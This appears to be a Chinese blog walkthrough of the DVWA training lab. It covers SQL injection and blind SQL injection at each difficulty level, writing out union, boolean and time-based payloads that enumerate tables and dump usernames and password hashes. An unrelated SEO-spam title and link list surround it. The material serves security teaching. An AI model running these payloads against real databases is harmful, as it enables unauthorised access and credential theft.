当前位置: 首页 > wzjs >正文

360网站页面的工具栏怎么做互联网企业营销策略

360网站页面的工具栏怎么做,互联网企业营销策略,vi设计概念,网站做图尺寸目录 1.SQL注入 1.1 low 1.2 Medium 1.3 high 1.4 impossible 1. SQL盲注 1.1 low 2.2 medium 2.3 high 2.4 impossible 1.SQL注入 显注:前端页面可以回显用户信息,比如 联合注入、报错注入。 盲注:前端页面不能回显用户信息,比…

目录

1.SQL注入

1.1 low

1.2 Medium

1.3 high

1.4 impossible

1. SQL盲注

1.1 low

2.2 medium

2.3 high

2.4 impossible


1.SQL注入

显注:前端页面可以回显用户信息,比如 联合注入、报错注入。

盲注:前端页面不能回显用户信息,比如 布尔盲注、时间盲注。

数字型注入:url、下拉单选菜单

字符型注入:账号密码登录

1.1 low

1.确认注入点
'1 or 1=1'
报错,存在注入点

2.确认注入类型-字符型/数字型

1+1,无报错,判断为字符型

查看源码

3.确认列数


1' order by 3 #  报错
order by加到报错为止,若3报错则这个表有两列

4.确认回显位置
1' union select 1,2 # 


union联合查询核心语句,有几列后面就需要select有几个值

5.爆库名
1' union select database(),2 #

6.爆表名
1' union select group_concat(table_name),2 from information_schema.tables where table_schema=database() #

7.获取表字段名
1' union select group_concat(column_name),2 from information_schema.columns where table_name='users' and table_schema=database() #

8.获取表字段值
1' union select password,user from users #

users为表名,password、user为表的字段

拿到了用户和密码,但密码是加密的,可使用md5自行解密 md5在线解密破解,md5解密加密

1.2 Medium

限制输入,抓包更改参数

id更改为1+1,报错,判读为数字型注入

查看源码

order by判断列数,结果发现列数为2

id=1 union select 1,2  测试回显

union select database(),2

后续步骤同上。

1.3 high

1+1判断,无报错,判断为字符型

1.4 impossible

 限制只能为数字   不存在注入

1. SQL盲注

1.1 low

核心就是and,如果猜中,回显正确,猜错,回显凑五

1‘ and 1=1 #,返回存在

猜解开数据库长度1' and length(database())=x # ,1~4逐个测试,发现4返回存在,说明数据库名为4位英文

1' and length(database())=5 ,返回不存在

用aascii猜解数据库名 1' and ascii(substr(database(),1,1))=100 # 由此确定,第一位ascii是100,对比ascii表

 通常情况下需要从97-122(对应26个小写英文字母)逐个测试。

1' and ascii(substr(database(),1,1))=99 #  显示不存在

猜库(库名字符长度--库名字符)

猜表(表个数--第一个表名字符长度--第一个表名的字符)

猜字段(字段个数--第一个字段名字符长度--第一个字段名的字符)

判断有多少个表 1' and (select count(table_name) from information_schema.tables where table_schema=database())=2 #

1' and (select count(table_name) from information_schema.tables where table_schema=database())=1 #
显示不存在
1' and (select count(table_name) from information_schema.tables where table_schema=database())=2 #
显示存在

结果为2个表

猜表名的长度

1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1 # 显示不存在1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=2 # 显示不存在…1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9 # 显示存在

猜第一个表名的第一个字母

1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>97 # 显示存在1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<122 # 显示存在1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<109 # 显示存在1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<103 # 显示不存在1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>103 # 显示不存在

说明第一个表的第一个字符为g,重复上述步骤即可猜解出两个表名(gusetbook、users)

猜字段名

1' and (select count(column_name) from information_schema.columns where table_name= 'users')=1 # 显示不存在…1' and (select count(column_name) from information_schema.columns where table_name= 'users')=8 # 显示存在

说明users表中有8个字段,然后挨个猜解字段名:

1' and length(substr((select column_name from information_schema.columns where table_name= 'users' limit 0,1),1))=1 # 显示不存在…1' and length(substr((select column_name from information_schema.columns where table_name= 'users' limit 0,1),1))=7 # 显示存在

说明user表的第一个字段名是7个字符,采用二分法即可猜解出所有字段名。

2.2 medium

布尔盲注

抓包改参数id为1 and length(database())=4 #,显示存在,说明数据库名的长度为4个字符;抓包改参数id为1 and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9 #,显示存在,说明数据中的第一个表名长度为9个字符;抓包改参数id为1 and (select count(column_name) from information_schema.columns where table_name= 0×7573657273)=8 #,(0x7573657273为users的16进制),显示存在,说明uers表有8个字段。

时间盲注

抓包改参数id为1 and if(length(database())=4,sleep(5),1) #,明显延迟,说明数据库名的长度为4个字符;抓包改参数id为1 and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9,sleep(5),1) #,明显延迟,说明数据中的第一个表名长度为9个字符;抓包改参数id为1 and if((select count(column_name) from information_schema.columns where table_name=0x7573657273 )=8,sleep(5),1) #,明显延迟,说明uers表有8个字段。

2.3 high

查看源码,High级别的代码利用cookie传递参数id,当SQL查询结果为空时,会执行函数sleep(seconds),目的是为了扰乱基于时间的盲注。同时在 SQL查询语句中添加了LIMIT 1,希望以此控制只输出一个结果。

虽然添加了LIMIT 1,但是我们可以通过#将其注释掉。但由于服务器端执行sleep函数,会使得基于时间盲注的准确性受到影响,这里我们只演示基于布尔的盲注:

抓包将cookie中参数id改为1’ and length(database())=4 #,显示存在,说明数据库名的长度为4个字符;抓包将cookie中参数id改为1’ and length(substr(( select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9 #,显示存在,说明数据中的第一个表名长度为9个字符;抓包将cookie中参数id改为1’ and (select count(column_name) from information_schema.columns where table_name=0×7573657273)=8 #,(0×7573657273 为users的16进制),显示存在,说明uers表有8个字段。

2.4 impossible

代码分析,可以看到,Impossible级别的代码采用了PDO技术,划清了代码与数据的界限,有效防御SQL注入,Anti-CSRF token机制的加入了进一步提高了安全性。无漏洞。

参考:

DVWA靶场(七、盲注) - tonywell - 博客园

dvwa靶场通关教程(保姆及
教学,一看就会)_dvwa通关教程-CSDN博客

http://www.dtcms.com/wzjs/433287.html

相关文章:

  • wordpress外部链接seo推广技术培训
  • 用腾讯云做会员网站谷歌商店官网下载
  • 如何得到网站后台权限市场营销课程
  • 做注册会计师网站百度广告标识
  • 兰州营销型网站建设网络营销是网上销售吗
  • 在手机上创建网站企业网站推广有哪些
  • 怎么查网站注册时间房地产新闻最新消息
  • 外包网站设计公司保定seo博客
  • 企业品牌网站建设公司站长工具seo综合查询怎么关闭
  • 创建购物网站sem营销
  • 外贸推广用中文网站济南网站seo哪家公司好
  • 云南网站开发公司网站优化推广seo公司
  • 常德海关网站网站整体优化
  • xp做网站优化算法
  • 做网站怎么申请域名地推接单在哪个平台找
  • 做网站15年优化seo设置
  • 绍兴网站建设08keji可以放友情链接的网站
  • jquery mobile网站模板盘多多百度网盘搜索引擎
  • 黄岐做网站黑帽seo是什么意思
  • 石家庄网站建设网站百度广告费一般多少钱
  • html网站开发软件杭州seo渠道排名
  • 网站开发合同下载手机软文广告300字
  • 微信扫一扫登录网站如何做广东疫情最新资讯
  • 为什么要做营销型的网站建设广州营销推广
  • 深圳建站企业企业邮箱查询
  • 怎么发布视频号什么是搜索引擎优化推广
  • wordpress 发布文章 慢网络优化工具
  • 山东中佛龙建设有限公司网站怎样做企业宣传推广
  • 网站建设的最终目标全渠道营销管理平台
  • 自助建站网站建设高质量外链平台